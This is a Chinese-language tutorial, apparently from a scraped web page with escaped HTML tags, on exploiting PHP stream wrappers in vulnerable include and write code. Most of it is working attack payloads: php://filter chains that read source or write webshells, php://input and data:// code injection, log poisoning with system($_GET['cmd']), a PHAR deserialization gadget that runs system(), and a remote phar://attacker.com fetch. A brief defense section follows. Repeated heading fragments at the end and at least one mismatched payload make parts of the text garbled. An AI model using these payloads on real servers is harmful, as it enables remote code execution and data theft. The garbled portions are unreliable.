PHP伪协议在白盒审计中的高级利用技巧<\/h1>

一、PHP伪协议概述<\/h2>
PHP伪协议是PHP提供的一系列特殊URL封装协议，允许以各种方式访问本地或远程资源。在白盒审计中，这些协议常被用于绕过安全限制、读取敏感文件或执行任意代码。<\/p>

二、核心伪协议利用技术<\/h2>

1. php:\/\/filter - 文件内容处理与绕过<\/h3>

基本利用方式<\/h4>

\/\/ 漏洞代码示例
<\/span><\/span><\/span><\/span>$file =<\/span> $_GET['page'<\/span>];
<\/span><\/span>include<\/span>($file .<\/span> '.php'<\/span>);
<\/span><\/span><\/code><\/pre>攻击方式<\/strong>：<\/p>

读取文件源码：http:\/\/example.com\/vuln.php?page=php:\/\/filter\/read=convert.base64-encode\/resource=config<\/code><\/li>
服务器返回config.php的Base64编码内容<\/li>
<\/ul>
绕过死亡代码防御<\/h4>
$content =<\/span> '<?php exit;'<\/span> .<\/span> $_GET['content'<\/span>];
<\/span><\/span>file_put_contents<\/span>($_GET['filename'<\/span>], $content);
<\/span><\/span><\/code><\/pre>攻击方式<\/strong>：<\/p>
?filename=php:\/\/filter\/write=convert.base64-decode\/resource=shell.php
&content=aPD9waHAgcGhwaW5mbygpOz8+
<\/code><\/pre>
原理<\/strong>：<\/p>

<?php exit;<\/code>被Base64解码为乱码<\/li>
后续正确编码的<?php phpinfo();?><\/code>被正常写入<\/li>
<\/ul>
多层过滤器链绕过<\/h4>
if<\/span> (strpos<\/span>(file_get_contents<\/span>($_GET['filename'<\/span>]), '<?php'<\/span>) !==<\/span> false<\/span>) {
<\/span><\/span>    unlink<\/span>($_GET['filename'<\/span>]);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>攻击方式<\/strong>：<\/p>
filename=php:\/\/filter\/write=string.rot13|convert.base64-decode\/resource=shell.php
&content=<?cuc cucvasb();?>
<\/code><\/pre>
2. php:\/\/input - POST数据注入<\/h3>
基本利用<\/h4>
$file =<\/span> $_GET['url'<\/span>];
<\/span><\/span>include<\/span>($file);
<\/span><\/span><\/code><\/pre>攻击方式<\/strong>：<\/p>
GET \/vuln.php?url=php:\/\/input HTTP\/1.1
Host: example.com
Content-Type: application\/x-www-form-urlencoded

<?php system('id'); ?>
<\/code><\/pre>
日志文件包含<\/h4>
GET \/vuln.php?url=\/var\/log\/nginx\/access.log HTTP\/1.1
User-Agent: <?php system('cat \/flag'); ?>
<\/code><\/pre>
3. data:\/\/ - 内联代码执行<\/h3>
include<\/span>($_GET['file'<\/span>]);
<\/span><\/span><\/code><\/pre>攻击方式<\/strong>：<\/p>
http:\/\/example.com\/vuln.php?file=data:\/\/text\/plain;base64,PD9waHAgcGhwaW5mbygpOz8=
<\/code><\/pre>
4. zip:\/\/ - 压缩包利用<\/h3>
攻击步骤<\/strong>：<\/p>

创建包含shell.php的ZIP文件，重命名为malicious.jpg<\/li>
上传文件<\/li>
包含压缩包内文件：<\/li>
<\/ol>
http:\/\/example.com\/include.php?file=zip:\/\/\/path\/to\/malicious.jpg%23shell.php
<\/code><\/pre>
5. phar:\/\/ - 反序列化攻击<\/h3>
基本利用<\/h4>
$file =<\/span> $_GET['file'<\/span>];
<\/span><\/span>include<\/span>($file);
<\/span><\/span><\/code><\/pre>攻击方式<\/strong>：<\/p>
http:\/\/example.com\/vuln.php?file=phar:\/\/uploads\/exploit.phar
<\/code><\/pre>
PHAR文件生成<\/h4>
class<\/span> Exploit<\/span> {
<\/span><\/span>    public<\/span> function<\/span> __destruct() {
<\/span><\/span>        system<\/span>($_GET['cmd'<\/span>]);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>$phar =<\/span> new<\/span> Phar<\/span>("exploit.phar"<\/span>);
<\/span><\/span>$phar-><\/span>startBuffering<\/span>();
<\/span><\/span>$phar-><\/span>addFromString<\/span>("test.txt"<\/span>, "payload"<\/span>);
<\/span><\/span>$phar-><\/span>setStub<\/span>("<?php __HALT_COMPILER(); ?>"<\/span>);
<\/span><\/span>$phar-><\/span>setMetadata<\/span>(new<\/span> Exploit<\/span>());
<\/span><\/span>$phar-><\/span>stopBuffering<\/span>();
<\/span><\/span><\/code><\/pre>远程PHAR触发<\/h4>
file=phar:\/\/attacker.com\/exploit.phar
<\/code><\/pre>
6. 其他特殊协议<\/h3>
glob:\/\/ - 目录遍历<\/h4>
file=glob:\/\/\/var\/www\/html\/*
<\/code><\/pre>
ogg:\/\/ - 反序列化(CVE-2020-7066)<\/h4>
file=ogg:\/\/\/path\/to\/payload.ogg
<\/code><\/pre>
expect:\/\/ - 命令执行(需扩展)<\/h4>
http:\/\/example.com\/vuln.php?cmd=expect:\/\/id
<\/code><\/pre>
三、编码转换绕过技术<\/h2>
1. iconv编码绕过<\/h3>
if<\/span>(preg_match<\/span>('\/php\/i'<\/span>, $_GET['file'<\/span>])) die<\/span>('Blocked!'<\/span>);
<\/span><\/span>include<\/span>($_GET['file'<\/span>]);
<\/span><\/span><\/code><\/pre>攻击方式<\/strong>：<\/p>
http:\/\/example.com\/vuln.php?file=php:\/\/filter\/convert.iconv.UTF-8.UTF-16\/resource=config.php
<\/code><\/pre>
2. UTF-16编码绕过WAF<\/h3>
file=php:\/\/filter\/read=convert.iconv.UTF-8.UTF-16\/resource=shell.php
<\/code><\/pre>
四、组合攻击技术<\/h2>
1. 日志注入+php:\/\/filter<\/h3>

注入恶意User-Agent：<\/li>
<\/ol>
GET \/ HTTP\/1.1
User-Agent: <?php system($_GET['cmd']); ?>
<\/code><\/pre>

包含日志文件：<\/li>
<\/ol>
http:\/\/example.com\/vuln.php?file=\/var\/log\/nginx\/access.log&cmd=id
<\/code><\/pre>

编码绕过：<\/li>
<\/ol>
http:\/\/example.com\/vuln.php?file=php:\/\/filter\/convert.base64-encode\/resource=\/var\/log\/nginx\/access.log
<\/code><\/pre>
2. 多层过滤器链<\/h3>
filename=php:\/\/filter\/write=string.strip_tags|convert.base64-decode\/resource=shell.php
&content=PD9waHAgcGhwaW5mbygpOz8+
<\/code><\/pre>
五、防御策略<\/h2>
1. 输入过滤<\/h3>

白名单限制：if (!in_array($file, ['safe.php'])) die('Invalid');<\/code><\/li>
过滤特殊字符：..\/<\/code>, php:\/\/<\/code>等<\/li>
<\/ul>
2. 配置优化<\/h3>

allow_url_include=Off<\/code><\/li>
allow_url_fopen=Off<\/code><\/li>
disable_functions=system,eval<\/code><\/li>
<\/ul>
3. 代码加固<\/h3>

避免动态包含用户输入<\/li>
使用realpath()<\/code>和basename()<\/code>规范化路径<\/li>
禁用非常用扩展<\/li>
<\/ul>
六、工具与验证<\/h2>

PHAR生成工具：<\/li>
<\/ol>
php -d phar.readonly=<\/span>0<\/span> generate_phar.php
<\/span><\/span><\/code><\/pre>
编码转换验证：<\/li>
<\/ol>
echo iconv(<\/span>"UTF-8"<\/span>, "UTF-16"<\/span>, file_get_contents(<\/span>"config.php"<\/span>))<\/span>;
<\/span><\/span><\/code><\/pre>
日志注入检测：<\/li>
<\/ol>
tail -f \/var\/log\/nginx\/access.log | grep '<?php'<\/span>
<\/span><\/span><\/code><\/pre>
过滤器链测试：<\/li>
<\/ol>
php -r "echo file_get_contents('php:\/\/filter\/read=string.rot13|convert.base64-encode\/resource=config.php');"<\/span>
<\/span><\/span><\/code><\/pre>

PHP伪协议在白盒审计中的高级利用技巧<\/h1>

一、PHP伪协议概述<\/h2> PHP伪协议是PHP提供的一系列特殊URL封装协议，允许以各种方式访问本地或远程资源。在白盒审计中，这些协议常被用于绕过安全限制、读取敏感文件或执行任意代码。<\/p>

二、核心伪协议利用技术<\/h2>

1. php:\/\/filter - 文件内容处理与绕过<\/h3>

2. php:\/\/input - POST数据注入<\/h3>

5. phar:\/\/ - 反序列化攻击<\/h3>

6. 其他特殊协议<\/h3>

三、编码转换绕过技术<\/h2>

四、组合攻击技术<\/h2>

五、防御策略<\/h2>

一、PHP伪协议概述<\/h2>
PHP伪协议是PHP提供的一系列特殊URL封装协议，允许以各种方式访问本地或远程资源。在白盒审计中，这些协议常被用于绕过安全限制、读取敏感文件或执行任意代码。<\/p>